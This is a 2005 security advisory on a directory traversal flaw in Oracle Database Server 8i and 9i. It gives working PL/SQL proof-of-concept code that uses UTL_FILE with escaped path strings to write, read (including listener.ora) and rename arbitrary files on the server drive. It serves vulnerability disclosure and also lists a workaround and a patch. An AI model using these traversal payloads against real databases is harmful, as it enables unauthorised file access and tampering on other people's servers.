Argeniss Security Advisory Name: Oracle Database Server Directory transversal Affected Software: Oracle Database Server versions 8i and 9i Severity : Medium Remote exploitable: Yes (Authentication to Database Server is needed) Credits: Cesar Cerrudo Date: 03/07/05 Advisory Number: ARG030501 Details: Oracle Database Server provides many packages functions to access the OS file system, some of these functions are not able to access files directly, for example in order to access files a Directory Object must be created and grant to users permissions on the object, this object references a directory in the file system and it can be used by functions to access files under that directory only. However functions don't properly validate the input and by supplying a especially constructed string the directory can be escaped and the parent directories can be accessed, because of this any file in the same drive as the directory, can be read, renamed, overwrited, etc. To reproduce the vulnerability execute the next PL/SQL: (In older Oracle database server versions the same could work just using "\..\..\") (This is not a extensive list of vulnerable functions, other functions that parse files could also be vulnerable) --this create a file called Unbreakable.txt in the same drive as the directory referenced by --MEDIA_DIR directory object. declare f utl_file.file_type; begin f:=UTL_FILE.FOPEN ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\Unbreakable.txt','w',1000); UTL_FILE.PUT_LINE (f,'Sure',TRUE); UTL_FILE.FCLOSE(f); end; --this example can be used to read arbitrary files in the same drive as the directory referenced by --MEDIA_DIR directory object. SET SERVEROUTPUT ON declare f utl_file.file_type; sBuffer Varchar(8000); begin f:=UTL_FILE.FOPEN ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\OracleDir\ora90\network\ADMIN\listener.ora','r'); loop UTL_FILE.GET_LINE (f,sBuffer); DBMS_OUTPUT.PUT_LINE(sBuffer); end loop; EXCEPTION when no_data_found then UTL_FILE.FCLOSE(f); end; --this rename any file in the same drive as the directory referenced by --MEDIA_DIR directory object begin UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\FileToRename','MEDIA_DIR','\\.\\..\\.\\..\\.\\Unbreakable.txt',TRUE); end; By default UTL_FILE package has execute permission to public role so any Oracle database user with permissions on a Directory Object can exploit this vulnerability. Explotation of this vulnerability allow an attacker to overwrite, read, rename, etc. arbitrary files. Vendor Status: Oracle was contacted on October 2003, after an initial email interchange i didn't have any news about when the vulnerability was going to be patched or when it was patched nor i was credited, but this is common when dealing with Oracle on security issues. Workaround: Restrict access to Directory Objects and UTL_FILE package. Patch Available: http://metalink.oracle.com Links: http://www.argeniss.com/research/ARGENISS-ADV-030501.txt http://www.petefinnigan.com/directory_traversal.pdf http://www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf Important!!!!!!!! There are still hundreds of unpatched Oracle Database Server vulnerabilities affecting versions 8i, 9i and 10g some of them have been reported more than 1 year ago. If you want to know more about these vulnerabilities and many others check out our AVI (Advanced Vulnerability Information) service at http://www.argeniss.com/services.html ----------------------------------- --Argeniss - Information Security-- -----http://www.argeniss.com------- ------info>at